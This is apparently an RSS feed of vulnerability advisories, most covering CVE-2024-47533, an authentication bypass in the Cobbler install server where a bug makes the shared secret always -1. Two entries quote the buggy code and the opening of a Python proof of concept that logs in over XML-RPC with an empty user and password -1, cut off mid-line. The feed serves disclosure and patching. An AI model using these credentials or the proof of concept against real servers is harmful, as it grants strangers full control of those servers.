<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Wed, 07 Oct 2026 04:54:53 +0000</lastBuildDate>
    <item>
      <title>bdu:2024-09952</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2024-09952</link>
      <description>bdu:2024-09952</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2024-09952</guid>
    </item>
    <item>
      <title>EUVD-2026-202410</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-202410</link>
      <description>EUVD-2026-202410</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-202410</guid>
    </item>
    <item>
      <title>fkie_cve-2024-47533</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2024-47533</link>
      <description>&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;#39;&amp;#39;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;#39;&amp;#39;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2024-47533</guid>
    </item>
    <item>
      <title>GHSA-m26c-fcgh-cp6h — cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-m26c-fcgh-cp6h</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: cobbler&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user &amp;#39;&amp;#39; password -1 and make any changes.&lt;/p&gt;
&lt;p&gt;### Details
utils.py get_shared_secret:
```
def get_shared_secret() -&amp;gt; Union[str, int]:
    &amp;#34;&amp;#34;&amp;#34;
    The &amp;#39;web.ss&amp;#39; file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.&lt;/p&gt;
&lt;p&gt;:return: The Cobbler secret which enables full access to Cobbler.
    &amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;try:
        with open(&amp;#34;/var/lib/cobbler/web.ss&amp;#34;, &amp;#39;rb&amp;#39;, encoding=&amp;#39;utf-8&amp;#39;) as fd:
            data = fd.read()
    except:
        return -1
    return str(data).strip()
```
Always returns `-1` because of the following exception:
```
binary mode doesn&amp;#39;t take an encoding argument
```&lt;/p&gt;
&lt;p&gt;This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.&lt;/p&gt;
&lt;p&gt;### PoC
```
#!/usr/bin/python3&lt;/p&gt;
&lt;p&gt;import ssl
import xmlrpc.client&lt;/p&gt;
&lt;p&gt;params = { &amp;#39;proto&amp;#39;: &amp;#39;https&amp;#39;, &amp;#39;host&amp;#39;: &amp;#39;COBBLER_SERVER&amp;#39;, &amp;#39;port&amp;#39;: &amp;#39;443&amp;#39;, &amp;#39;username&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;password&amp;#39;: -1 }
ssl_context = ssl._create_unverified_context()&lt;/p&gt;
&lt;p&gt;url = &amp;#39;{proto}://{host}:{port}/cobbler_api&amp;#39;.format(**params)
if ssl_context:
    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
    conn = xmlrpc.client.Server(url)&lt;/p&gt;
&lt;p&gt;try:
    token = conn.login(para…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: cobbler&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user &amp;#39;&amp;#39; password -1 and make any changes.&lt;/p&gt;
&lt;p&gt;### Details
utils.py get_shared_secret:
```
def get_shared_secret() -&amp;gt; Union[str, int]:
    &amp;#34;&amp;#34;&amp;#34;
    The &amp;#39;web.ss&amp;#39; file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.&lt;/p&gt;
&lt;p&gt;:return: The Cobbler secret which enables full access to Cobbler.
    &amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;try:
        with open(&amp;#34;/var/lib/cobbler/web.ss&amp;#34;, &amp;#39;rb&amp;#39;, encoding=&amp;#39;utf-8&amp;#39;) as fd:
            data = fd.read()
    except:
        return -1
    return str(data).strip()
```
Always returns `-1` because of the following exception:
```
binary mode doesn&amp;#39;t take an encoding argument
```&lt;/p&gt;
&lt;p&gt;This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.&lt;/p&gt;
&lt;p&gt;### PoC
```
#!/usr/bin/python3&lt;/p&gt;
&lt;p&gt;import ssl
import xmlrpc.client&lt;/p&gt;
&lt;p&gt;params = { &amp;#39;proto&amp;#39;: &amp;#39;https&amp;#39;, &amp;#39;host&amp;#39;: &amp;#39;COBBLER_SERVER&amp;#39;, &amp;#39;port&amp;#39;: &amp;#39;443&amp;#39;, &amp;#39;username&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;password&amp;#39;: -1 }
ssl_context = ssl._create_unverified_context()&lt;/p&gt;
&lt;p&gt;url = &amp;#39;{proto}://{host}:{port}/cobbler_api&amp;#39;.format(**params)
if ssl_context:
    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
    conn = xmlrpc.client.Server(url)&lt;/p&gt;
&lt;p&gt;try:
    token = conn.login(para…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-m26c-fcgh-cp6h</guid>
    </item>
    <item>
      <title>OESA-2025-1411 — cobbler security update</title>
      <link>https://cve.radiocsirt.org/vuln/oesa-2025-1411</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:22.03-LTS-SP4: cobbler&lt;/p&gt;
&lt;p&gt;Cobbler is a network install server. Cobbler supports PXE, ISO virtualized installs, and re-installing existing Linux machines. The last two modes use a helper tool, &amp;amp;amp;apos;koan&amp;amp;amp;apos;, that integrates with cobbler. Cobbler&amp;amp;amp;apos;s advanced features include importing distributions from DVDs and rsync mirrors, kickstart templating, integrated yum mirroring, and built-in DHCP/DNS Management. Cobbler has a XML-RPC API for integration with other applications.&#13;
&#13;
Security Fix(es):&lt;/p&gt;
&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;amp;apos;&amp;amp;apos;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.(CVE-2024-47533)&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; openEuler:22.03-LTS-SP4: cobbler&lt;/p&gt;
&lt;p&gt;Cobbler is a network install server. Cobbler supports PXE, ISO virtualized installs, and re-installing existing Linux machines. The last two modes use a helper tool, &amp;amp;amp;apos;koan&amp;amp;amp;apos;, that integrates with cobbler. Cobbler&amp;amp;amp;apos;s advanced features include importing distributions from DVDs and rsync mirrors, kickstart templating, integrated yum mirroring, and built-in DHCP/DNS Management. Cobbler has a XML-RPC API for integration with other applications.&#13;
&#13;
Security Fix(es):&lt;/p&gt;
&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;amp;apos;&amp;amp;apos;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.(CVE-2024-47533)&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/oesa-2025-1411</guid>
    </item>
    <item>
      <title>openSUSE-SU-2024:0370-1 — Security update for cobbler</title>
      <link>https://cve.radiocsirt.org/vuln/opensuse-su-2024:0370-1</link>
      <description>&lt;p&gt;Security update for cobbler&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Security update for cobbler&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/opensuse-su-2024:0370-1</guid>
    </item>
    <item>
      <title>PYSEC-2026-316 — cobbler allows anyone to connect to cobbler XML-RPC server with known password and make changes</title>
      <link>https://cve.radiocsirt.org/vuln/pysec-2026-316</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: cobbler&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user &amp;#39;&amp;#39; password -1 and make any changes.&lt;/p&gt;
&lt;p&gt;### Details
utils.py get_shared_secret:
```
def get_shared_secret() -&amp;gt; Union[str, int]:
    &amp;#34;&amp;#34;&amp;#34;
    The &amp;#39;web.ss&amp;#39; file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.&lt;/p&gt;
&lt;p&gt;:return: The Cobbler secret which enables full access to Cobbler.
    &amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;try:
        with open(&amp;#34;/var/lib/cobbler/web.ss&amp;#34;, &amp;#39;rb&amp;#39;, encoding=&amp;#39;utf-8&amp;#39;) as fd:
            data = fd.read()
    except:
        return -1
    return str(data).strip()
```
Always returns `-1` because of the following exception:
```
binary mode doesn&amp;#39;t take an encoding argument
 ```&lt;/p&gt;
&lt;p&gt;This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.&lt;/p&gt;
&lt;p&gt;### PoC
```
#!/usr/bin/python3&lt;/p&gt;
&lt;p&gt;import ssl
 import xmlrpc.client&lt;/p&gt;
&lt;p&gt;params = { &amp;#39;proto&amp;#39;: &amp;#39;https&amp;#39;, &amp;#39;host&amp;#39;: &amp;#39;COBBLER_SERVER&amp;#39;, &amp;#39;port&amp;#39;: &amp;#39;443&amp;#39;, &amp;#39;username&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;password&amp;#39;: -1 }
ssl_context = ssl._create_unverified_context()
 
url = &amp;#39;{proto}://{host}:{port}/cobbler_api&amp;#39;.format(**params)
if ssl_context:
    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
    conn = xmlrpc.client.Server(url)&lt;/p&gt;
&lt;p&gt;try:
    token = conn.login(p…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; PyPI: cobbler&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;utils.get_shared_secret() always returns -1 - allows anyone to connect to cobbler XML-RPC as user &amp;#39;&amp;#39; password -1 and make any changes.&lt;/p&gt;
&lt;p&gt;### Details
utils.py get_shared_secret:
```
def get_shared_secret() -&amp;gt; Union[str, int]:
    &amp;#34;&amp;#34;&amp;#34;
    The &amp;#39;web.ss&amp;#39; file is regenerated each time cobblerd restarts and is used to agree on shared secret interchange
    between the web server and cobblerd, and also the CLI and cobblerd, when username/password access is not required.
    For the CLI, this enables root users to avoid entering username/pass if on the Cobbler server.&lt;/p&gt;
&lt;p&gt;:return: The Cobbler secret which enables full access to Cobbler.
    &amp;#34;&amp;#34;&amp;#34;&lt;/p&gt;
&lt;p&gt;try:
        with open(&amp;#34;/var/lib/cobbler/web.ss&amp;#34;, &amp;#39;rb&amp;#39;, encoding=&amp;#39;utf-8&amp;#39;) as fd:
            data = fd.read()
    except:
        return -1
    return str(data).strip()
```
Always returns `-1` because of the following exception:
```
binary mode doesn&amp;#39;t take an encoding argument
 ```&lt;/p&gt;
&lt;p&gt;This appears to have been introduced by commit 32c5cada013dc8daa7320a8eda9932c2814742b0 and so affects versions 3.0.0+.&lt;/p&gt;
&lt;p&gt;### PoC
```
#!/usr/bin/python3&lt;/p&gt;
&lt;p&gt;import ssl
 import xmlrpc.client&lt;/p&gt;
&lt;p&gt;params = { &amp;#39;proto&amp;#39;: &amp;#39;https&amp;#39;, &amp;#39;host&amp;#39;: &amp;#39;COBBLER_SERVER&amp;#39;, &amp;#39;port&amp;#39;: &amp;#39;443&amp;#39;, &amp;#39;username&amp;#39;: &amp;#39;&amp;#39;, &amp;#39;password&amp;#39;: -1 }
ssl_context = ssl._create_unverified_context()
 
url = &amp;#39;{proto}://{host}:{port}/cobbler_api&amp;#39;.format(**params)
if ssl_context:
    conn = xmlrpc.client.ServerProxy(url, context=ssl_context)
else:
    conn = xmlrpc.client.Server(url)&lt;/p&gt;
&lt;p&gt;try:
    token = conn.login(p…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/pysec-2026-316</guid>
    </item>
    <item>
      <title>SUSE-SU-2024:4006-1 — Security update for SUSE Manager Server 4.3</title>
      <link>https://cve.radiocsirt.org/vuln/suse-su-2024:4006-1</link>
      <description>&lt;p&gt;Security update for SUSE Manager Server 4.3&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Security update for SUSE Manager Server 4.3&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/suse-su-2024:4006-1</guid>
    </item>
    <item>
      <title>Withdrawn: UBUNTU-CVE-2024-47533</title>
      <link>https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-47533</link>
      <description>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: cobbler&lt;/p&gt;
&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;#39;&amp;#39;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Withdrawn by the publisher.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; Ubuntu:Pro:16.04:LTS: cobbler&lt;/p&gt;
&lt;p&gt;Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability starting in version 3.0.0 and prior to versions 3.2.3 and 3.3.7. `utils.get_shared_secret()` always returns `-1`, which allows anyone to connect to cobbler XML-RPC as user `&amp;#39;&amp;#39;` password `-1` and make any changes. This gives anyone with network access to a cobbler server full control of the server. Versions 3.2.3 and 3.3.7 fix the issue.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ubuntu-cve-2024-47533</guid>
    </item>
    <item>
      <title>WID-SEC-W-2024-3491 — cobbler: Schwachstelle ermöglicht Erlangen von Administratorrechten</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2024-3491</link>
      <description>&lt;p&gt;Ein entfernter, anonymer Angreifer kann eine Schwachstelle in cobbler ausnutzen, um Administratorrechte zu erlangen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein entfernter, anonymer Angreifer kann eine Schwachstelle in cobbler ausnutzen, um Administratorrechte zu erlangen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2024-3491</guid>
    </item>
  </channel>
</rss>
